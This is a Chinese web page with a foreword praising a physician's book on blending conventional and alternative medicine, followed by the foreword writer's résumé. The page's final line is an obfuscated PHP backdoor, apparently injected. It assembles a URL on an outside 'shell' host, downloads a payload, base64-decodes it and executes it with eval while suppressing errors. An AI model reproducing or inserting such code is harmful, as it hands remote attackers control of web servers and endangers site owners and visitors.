收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

醫學禪者劉大元

劉省作中央健保局國會聯絡室主任

在醫病的互動中學習、摸索,實有賴如禪者般的願力,而患者的痊癒,正是他最大的報償。

涉獵醫療領域,純是公職生涯的一個偶然;而認識大元兄賢伉儷,則是情治經驗的大驚喜!也因著這段緣分, 讓我認識到這麼一位孜孜矻矻於探究傳統醫學、琢磨中西 合璧,從而連結先人智慧之結晶、拓展另類療法的領域、 取精用宏施以造福無數病患之現代醫道禪者。

誠如陽明大學何院長所言,實證醫學結合經驗法則是現代醫學的慣例。而在宛如瀚海的人類醫學領域,吾人現今能夠處理的,泰半仍以疾病之治療為主;至於在多數傳染病與預防醫學方面,囿於對造物者奧秘之解析不易,另 類療法不但沒有隨著時代的演進褪色,反而成為今日醫學的寄望之一。傳染病如此,癌症之治療亦復如是。

劉醫師自醫學院畢業後,在臨床實習、歷練,取得 專科醫師證書後,仍然戮力於造福患者的工作。在醫病的互動中,「另類醫學」的理論與實務,適時引起了他的興趣。而在此後的學習、摸索,實亦有賴如禪者般的願力, 方得以在實證醫療中逐步建立起信心,弭平一些過去的缺 憾;而患者的痊癒,正是最大的報償。

醫學是精密的科學,也是一門神聖的、內外兼修的 哲學。個人無意對大元兄的藝業有備至的推崇;但是,近 二十年的了解與無盡地受惠,後學對於大元兄賢伉儷在傳 統醫學中融入另類療法,並結合成「另類醫學」的苦心與 進境,實難不生肅然起敬之心。科學是日起有功的學問, 歧黃之道,倍加需要專業、經驗與愛心,用以鎔鑄視病猶 親的初衷。人生逆旅,得有此一亦師亦友亦醫的禪者眷 顧,真是一大樂事。

另類療法,系出多門,甚且有著種族與地域的差別。 因此,因為人的體質、生活習慣、及遺傳等等因素,在成 分、劑量、療效及安全性等方面,有待驗證之處所在多 有;惟此皆必須仰仗杏林諸賢植基於前輩的成果上,作百 尺竿頭更進一步的堅持與努力,用以落實痌瘝在抱的天職。

目前,劉醫師的努力已然小有成就,且願以無私的襟 懷將心得公諸於世,備供參採或驗證;然禪者志在自渡渡人,祈願 業界先進共勉之。茲逢大元兄之大作出版,歡祝之餘,謹贅述數語,聊供卓參。



劉省作 簡介

‧國家文官學院講座
‧台灣警備總司令部國會聯絡員
‧行政院衛生署國會聯絡員‧財團法人國家
衛生研究院院長室高級專員兼國會聯絡員
‧兼任財團法人國家衛生研究院公共事務顧問
‧兼任財團法人醫藥品查驗中心公共事務顧問
‧兼任警察專科學校教師



 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));